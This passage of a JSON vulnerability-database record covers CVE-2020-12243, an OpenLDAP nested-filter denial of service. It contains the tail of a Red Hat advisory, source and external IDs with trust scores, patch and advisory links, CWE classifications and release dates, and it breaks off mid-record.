References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-12652\nhttps://access.redhat.com/security/cve/CVE-2018-20843\nhttps://access.redhat.com/security/cve/CVE-2019-5094\nhttps://access.redhat.com/security/cve/CVE-2019-5188\nhttps://access.redhat.com/security/cve/CVE-2019-11719\nhttps://access.redhat.com/security/cve/CVE-2019-11727\nhttps://access.redhat.com/security/cve/CVE-2019-11756\nhttps://access.redhat.com/security/cve/CVE-2019-12749\nhttps://access.redhat.com/security/cve/CVE-2019-14866\nhttps://access.redhat.com/security/cve/CVE-2019-14973\nhttps://access.redhat.com/security/cve/CVE-2019-15903\nhttps://access.redhat.com/security/cve/CVE-2019-17006\nhttps://access.redhat.com/security/cve/CVE-2019-17023\nhttps://access.redhat.com/security/cve/CVE-2019-17498\nhttps://access.redhat.com/security/cve/CVE-2019-17546\nhttps://access.redhat.com/security/cve/CVE-2019-19956\nhttps://access.redhat.com/security/cve/CVE-2019-20388\nhttps://access.redhat.com/security/cve/CVE-2019-20907\nhttps://access.redhat.com/security/cve/CVE-2020-1971\nhttps://access.redhat.com/security/cve/CVE-2020-5313\nhttps://access.redhat.com/security/cve/CVE-2020-6829\nhttps://access.redhat.com/security/cve/CVE-2020-7595\nhttps://access.redhat.com/security/cve/CVE-2020-8177\nhttps://access.redhat.com/security/cve/CVE-2020-8625\nhttps://access.redhat.com/security/cve/CVE-2020-12243\nhttps://access.redhat.com/security/cve/CVE-2020-12400\nhttps://access.redhat.com/security/cve/CVE-2020-12401\nhttps://access.redhat.com/security/cve/CVE-2020-12402\nhttps://access.redhat.com/security/cve/CVE-2020-12403\nhttps://access.redhat.com/security/cve/CVE-2020-14422\nhttps://access.redhat.com/security/cve/CVE-2020-15999\nhttps://access.redhat.com/security/cve/CVE-2021-3156\nhttps://access.redhat.com/security/cve/CVE-2021-3447\nhttps://access.redhat.com/security/cve/CVE-2021-20178\nhttps://access.redhat.com/security/cve/CVE-2021-20180\nhttps://access.redhat.com/security/cve/CVE-2021-20191\nhttps://access.redhat.com/security/cve/CVE-2021-20228\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/security/cve/CVE-2021-20191\nhttps://access.redhat.com/security/cve/CVE-2021-20178\nhttps://access.redhat.com/security/cve/CVE-2021-20180\nhttps://access.redhat.com/security/cve/CVE-2021-20228\nhttps://access.redhat.com/security/cve/CVE-2021-3447\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYHBeatzjgjWX9erEAQhLuw//QLV4QWc4E9o8cG3IJr3xIt6b/OHs6b9s\nhp04e5kT7IWFpmR3VXK+BEK2dd+NiGdvXPOpwe4BaOUWEDmq+dx4Vac5Z0GcZJUK\nAJz8dXFPYBgIafuIkWyY9UIvSO/VsQ2Dr4+KUnB1obALAz3ndSoQJFS1hysFBXHS\n+MulKiYVwFw7UbfvGuFLjmLrNTAflVa9MHmdh3P53bU+U2mCgzuHTFIpodkZhuIt\naIR0H/dgHXXG8co20Zb5Nciqr0CxqejQ+xz84Yu0I+y1LWdBAhi34c3zJY4rlEQS\n6/nfcsSPEadNCTXQu/TX6yvo6sE8A7/xGh1PDf0PLVv+Xh7TE53MtmTnYcl8uiRO\n9m3CfJ7PLO2hpl6QuJzuUe7nXx65/qIoKQjZfNpZVXj/LQtL1F4RE7szmswIGNZL\nIG51pYEUE98aR3gIlLpoMjW4vtC+rdcwSBaLW5gH1Q5hNRlTLmFBTKmYNkCpd4Ho\nNP3AKEwx9R8ZdGYcCuZwYPvSQSqX+B9qURw5G4E/vbso8Vh9RYQ3kusnf93Q/1LG\nImHCbsVWJDMMt/NRj5OvqgZc18ROqHhSpuJ+A44VCI+UihkZb2ai4DjGef0WHZhq\nXTMyLECTJIwM4aY+BC1ohYm0Whvs/w/hd03tGFBJhlIoBYakY6o8lRD7hCc8E/YI\ndEQ0aSabgEY=D/Lt\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Description:\n\n* Updated python-psutil version to 5.6.6 inside ansible-runner container\n(CVE-2019-18874)\n\n3. Solution:\n\nFor information on upgrading Ansible Tower, reference the Ansible Tower\nUpgrade and Migration Guide:\nhttps://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/\nindex.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1772014 - CVE-2019-18874 python-psutil: double free because of refcount mishandling\n\n5",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12243"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "PACKETSTORM",
"id": "168811"
},
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "PACKETSTORM",
"id": "159552"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-12243",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "157602",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159553",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162142",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "159347",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "161916",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "162130",
"trust": 0.7
},
{
"db": "ICS CERT",
"id": "ICSA-22-116-01",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.1207",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1637",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2604",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0845",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1742.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3631",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1742",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1458",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0986",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3535",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1193",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1569",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1613",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "159552",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "157601",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-27485",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-164902",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-12243",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168811",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159661",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "PACKETSTORM",
"id": "168811"
},
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "PACKETSTORM",
"id": "159552"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"id": "VAR-202004-0530",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
}
],
"trust": 0.725
},
"last_update_date": "2026-04-10T22:49:42.856000Z",
"patch": {
"_id": null,
"data": [
{
"title": "[SECURITY] [DLA 2199-1] openldap security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00001.html"
},
{
"title": "DSA-4666",
"trust": 0.8,
"url": "https://www.debian.org/security/2020/dsa-4666"
},
{
"title": "Issue#9248",
"trust": 0.8,
"url": "https://git.openldap.org/openldap/openldap/-/blob/OPENLDAP_REL_ENG_2_4/CHANGES"
},
{
"title": "ITS#9202 limit depth of nested filters",
"trust": 0.8,
"url": "https://git.openldap.org/openldap/openldap/-/commit/98464c11df8247d6a11b52e294ba5dd4f0380440"
},
{
"title": "Issue 9202",
"trust": 0.8,
"url": "https://bugs.openldap.org/show_bug.cgi?id=9202"
},
{
"title": "OpenLDAP Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=118093"
},
{
"title": "Red Hat: Moderate: openldap security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204041 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: openldap vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4352-1"
},
{
"title": "Ubuntu Security Notice: openldap vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4352-2"
},
{
"title": "Debian Security Advisories: DSA-4666-1 openldap -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=fb4df889a45e12b120ab07487d89cbed"
},
{
"title": "Amazon Linux 2: ALAS2-2020-1539",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2020-1539"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204254 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.6 runner release (CVE-2019-18874)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204255 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerabilities affect IBM Cloud Object Storage Systems (July 2020v1)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=4ca8040b949152189bea3a3126afcd39"
},
{
"title": "Red Hat: Low: OpenShift Container Platform 4.3.40 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204264 - Security Advisory"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-674",
"trust": 1.1
},
{
"problemtype": "CWE-400",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12243"
},
{
"trust": 1.9,
"url": "https://usn.ubuntu.com/4352-1/"
},
{
"trust": 1.8,
"url": "https://git.openldap.org/openldap/openldap/-/blob/openldap_rel_eng_2_4/changes"
},
{
"trust": 1.8,
"url": "https://git.openldap.org/openldap/openldap/-/commit/98464c11df8247d6a11b52e294ba5dd4f0380440"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200511-0003/"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht211289"
},
{
"trust": 1.8,
"url": "https://www.debian.org/security/2020/dsa-4666"
},
{
"trust": 1.8,
"url": "https://bugs.openldap.org/show_bug.cgi?id=9202"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00001.html"
},
{
"trust": 1.8,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00016.html"
},
{
"trust": 1.8,
"url": "https://usn.ubuntu.com/4352-2/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12243"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1742.2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3535/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1458/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1569/"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-116-01"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159553/red-hat-security-advisory-2020-4255-01.html"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht211289"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0986"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/openldap-denial-of-service-via-search-filters-32124"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1207"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0845"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2604"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159347/red-hat-security-advisory-2020-4041-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161727/red-hat-security-advisory-2021-0778-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157602/ubuntu-security-notice-usn-4352-2.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1637/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/161916/red-hat-security-advisory-2021-0949-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162142/red-hat-security-advisory-2021-1079-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1613/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1193"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3631/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1742/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162130/red-hat-security-advisory-2021-1129-01.html"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17023"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-6829"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12652"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12403"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20388"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11756"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12243"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-14973"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17498"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12749"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-7595"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17006"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19956"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-19956"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17546"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12400"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14973"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12402"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2017-12652"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-12401"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17546"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-11719"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20388"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5094"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11727"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-5188"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17498"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19126"
},
{
"trust": 0.3,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-5482"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12450"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20386"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14822"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14822"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16935"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12450"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20386"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19126"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12400"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-5313"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4352-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1240"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-18874"
},
{
"trust": 0.2,
"url": "https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18874"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14365"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/674.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4041"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-116-01"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/openldap"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4352-2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4264"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-2974"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2226"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2780"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2974"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2752"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.3/release_notes/ocp-4-3-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14352"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2225"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12825"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8696"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2181"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2182"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.3/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8675"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-18190"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2224"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9283"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11068"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-2812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20907"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:1079"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8625"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12402"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1971"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20228"
},
{
"trust": 0.1,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12401"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3156"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3447"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20191"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1971"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20180"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12403"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15999"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14422"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20907"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20178"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14422"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4255"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.48+dfsg-1ubuntu1.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.42+dfsg-2ubuntu3.8"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.45+dfsg-1ubuntu1.5"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/openldap/2.4.49+dfsg-2ubuntu1.2"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4254"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "PACKETSTORM",
"id": "168811"
},
{
"db": "PACKETSTORM",
"id": "157602"
},
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "157601"
},
{
"db": "PACKETSTORM",
"id": "159552"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-164902",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-12243",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168811",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157602",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159661",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157601",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "159552",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-12243",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-04-28T00:00:00",
"db": "VULHUB",
"id": "VHN-164902",
"ident": null
},
{
"date": "2020-04-28T00:00:00",
"db": "VULMON",
"id": "CVE-2020-12243",
"ident": null
},
{
"date": "2020-04-28T19:12:00",
"db": "PACKETSTORM",
"id": "168811",
"ident": null
},
{
"date": "2020-05-07T15:33:32",
"db": "PACKETSTORM",
"id": "157602",
"ident": null
},
{
"date": "2020-10-21T15:40:32",
"db": "PACKETSTORM",
"id": "159661",
"ident": null
},
{
"date": "2021-04-09T15:06:13",
"db": "PACKETSTORM",
"id": "162142",
"ident": null
},
{
"date": "2020-10-14T16:52:18",
"db": "PACKETSTORM",
"id": "159553",
"ident": null
},
{
"date": "2020-05-07T15:33:27",
"db": "PACKETSTORM",
"id": "157601",
"ident": null
},
{
"date": "2020-10-14T16:52:12",
"db": "PACKETSTORM",
"id": "159552",
"ident": null
},
